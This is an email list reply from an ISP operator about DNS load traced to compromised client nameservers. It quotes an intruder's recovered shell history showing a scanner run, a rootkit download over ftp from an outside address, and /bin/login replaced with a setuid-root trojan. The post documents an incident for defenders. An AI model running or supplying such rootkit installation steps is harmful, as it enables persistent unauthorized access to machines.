On Sun, 23 Apr 2000 jlewis@lewis.org wrote:
If you're looking at the stats enough to pin down heavy usage to individual systems, it shouldn't be too much more work to track down why they're suddenly making the top ten list. i.e. is it a bug in their resolver, or were they hacked and running some scanner kit that makes heavy use of DNS, with A hard-coded into the scanner?
While investigating several recent breakins on client machines, I have found that the latter is most likely the case:
From the .bash_history file that was found on one of the machines:
./t666 1 killall -9 named ./t666 1 ./t666 1 ./t666 1 ftp 62.0.178.10 tar -zxvf login.tgz cd login pico rk.h ./configure make cd src mv login /bin chmod 4755 /bin/login ls -ls /bin/login Sadly, the t666 program was not anywhere to be found on the machine. The machine that was compromised was a clients nameserver. It was configured to use our nameservers as forwarders. When the script-kiddy was running the t666 program, it was beating the hell out of our nameservers. Alarms went off, we checked the logs and showed thousands of connections open from their nameserver to ours. When we got into the box, the login.tgz and .bash_history file are all that was to be found. ---- John Fraizer EnterZone, Inc